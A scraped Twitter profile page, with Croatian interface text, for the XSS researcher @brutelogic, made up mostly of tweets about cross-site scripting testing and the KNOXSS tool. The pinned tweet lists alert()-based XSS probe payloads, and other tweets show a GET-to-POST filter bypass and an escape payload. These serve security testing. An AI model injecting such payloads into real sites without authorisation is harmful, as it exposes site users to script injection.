Brute Logic

@brutelogic

Research & Development. Helping people to stuff. Also and .

Brazil  
Vrijeme pridruživanja: listopad 2009.

Tweetovi

Blokirali ste korisnika/cu @brutelogic

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @brutelogic

  1. Prikvačeni tweet
    12. lip 2019.

    Here's a small list for manual testing (main cases, high success rate). "><img src onerror=alert(1)> "autofocus onfocus=alert(1)// </script><script>alert(1)</script> '-alert(1)-' \'-alert(1)// javascript:alert(1) Try it on: - URL query, fragment & path; - all input fields.

    Prikaži ovu nit
    Poništi
  2. 4. velj

    Mike is a very knowledgeable guy who is also at Eternal Noobs Discord server now. Stay tuned to his next tricks! 😉

    Poništi
  3. proslijedio/la je Tweet
    2. velj

    You don't have to tell them, they do it already like this... Serious now, I hope this is a joke 😬

    Poništi
  4. proslijedio/la je Tweet
    1. velj

    The level of support and knowledge that provides you with his services are beyond the help you need. Great findings with his tool which is a super help as a penetration tester! and worth the price! Thanks

    Poništi
  5. proslijedio/la je Tweet
    26. sij

    GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'

    Poništi
  6. proslijedio/la je Tweet
    21. sij
    Poništi
  7. proslijedio/la je Tweet
    20. sij

    We are seeing people coming for after getting to know some cool finding by a friend or even by means of a reporter or inside companies. We would like to hear you. How did you get to know about KNOXSS?

    Poništi
  8. proslijedio/la je Tweet
    18. sij

    dom xss Exercise your muscles and pop an alert box on these 3 main DOM-based reflected cases! by

    Prikaži ovu nit
    Poništi
  9. 17. sij

    Looking for a place to get help and to help others with hacking related stuff?

    Poništi
  10. 17. sij

    Clear and Creepy Danger of Machine Learning: Hacking Passwords by Tikeswar Naik in

    Poništi
  11. 16. sij
    Poništi
  12. 16. sij

    "Chain of Fools". Lovely. 😎 Congrats to all guys involved!

    Poništi
  13. 16. sij

    Yeah, I know. It's weird. debug - self

    Poništi
  14. 16. sij
    Poništi
  15. proslijedio/la je Tweet
    15. sij

    How many flaws out there you might be missing by not checking this kind of escape? -alert(1)//\ by

    Poništi
  16. 13. sij
    Poništi
  17. proslijedio/la je Tweet
    17. lis 2018.
    Poništi
  18. proslijedio/la je Tweet
    11. sij

    Follow this step-by-step guide to properly test for … Like a ! by

    Poništi
  19. proslijedio/la je Tweet
    6. sij

    Relaunching Eternal Noobs in Discord, join us! Brutal Secrets & KNOXSS coming next.

    Poništi
  20. proslijedio/la je Tweet

    Master the 7 Main XSS Cases and be able to spot more than 90% of XSS vulnerabilities out there. by

    Poništi
  21. 6. sij

    Relaunching Eternal Noobs in Discord, join us! Brutal Secrets & KNOXSS coming next.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·